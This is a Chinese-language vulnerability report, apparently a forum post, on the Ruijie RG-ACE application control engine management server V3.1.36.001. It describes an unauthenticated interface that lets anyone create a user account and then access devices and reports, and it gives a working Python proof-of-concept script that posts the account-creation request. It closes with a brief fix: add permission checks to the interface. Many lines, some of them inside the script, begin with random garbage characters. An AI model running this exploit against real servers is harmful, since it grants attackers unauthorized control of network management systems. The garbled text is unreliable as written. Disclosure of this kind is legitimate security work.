锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
: K4 J8 J6 q6 a, P7 f' _0 c

测试的具体版本是
6 Z- N, r. h' p+ S产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
" O" D2 o/ I9 F8 i+ A! |# L编译时间: 201104291730
9 n' b" R! B( g
( U" |2 Y, W, r, K7 t/ E
; t. x, r7 y) e9 t: U& V- a; ^漏洞证明：
. O: W& b/ [  m0 F* i

. c" d+ ?* v5 O0 y6 l% {+ K7 s
4 q  y9 {7 ^' i( E$ u: o7 n
5 I4 R! F+ w+ V- Z

" H( t2 p$ B* U. j1 s7 {执行脚本
' k0 U5 e& l" j# u" t& F#! /usr/bin/env python
2 d/ ~% f+ s- _/ H+ W* r! o# b) k2 O#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
2 f  U7 C2 m, P+ G("useropermanager","userManager"),
* y$ L7 n, X" l9 a6 ]8 ?! @5 T# s("userName","t"), #######账号自己加
% u$ T' K' ?8 }( \3 L* \& ^) g4 j("pwd","aaaaaa"),######密码自己加
2 }9 \$ X& D! F% Q4 X("trueName","ad"),
("email",""),
("mobilePhone",""),
, Y  X5 Q; R$ D( h  V("officePhone",""),
* X5 R+ j: |* z3 [% a% q4 N("addr",""),
9 M9 n; N6 w; P; L  S' n$ k4 `("submit","确定"))
/ y' X' ~# M" W( }0 T# r8 kurllib2.install_opener(opener)
. u$ B. x; b' L# A5 h- yp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
, f+ J5 w1 B1 c7 z, ~0 {8 c) N
登录，连接设备
* c5 \7 r, P! i
" r* S( o& g/ ^3 c7 U  f, G- A* `8 ^& r



, L3 p6 Q9 |7 |: }: A默认的管理员admin权限更大点

/ H$ Z8 p  P/ z
" M  f4 `, [5 ?" h. X, u, @

4 m6 u) x) _8 J0 j  V$ q2 `
修复方案：
; j, Q, j! Q5 p2 e/ S: H加强对接口的权限验证
4 R+ ^, x3 R$ Q* h3 l% P9 T
4 w; @# g! n* L  H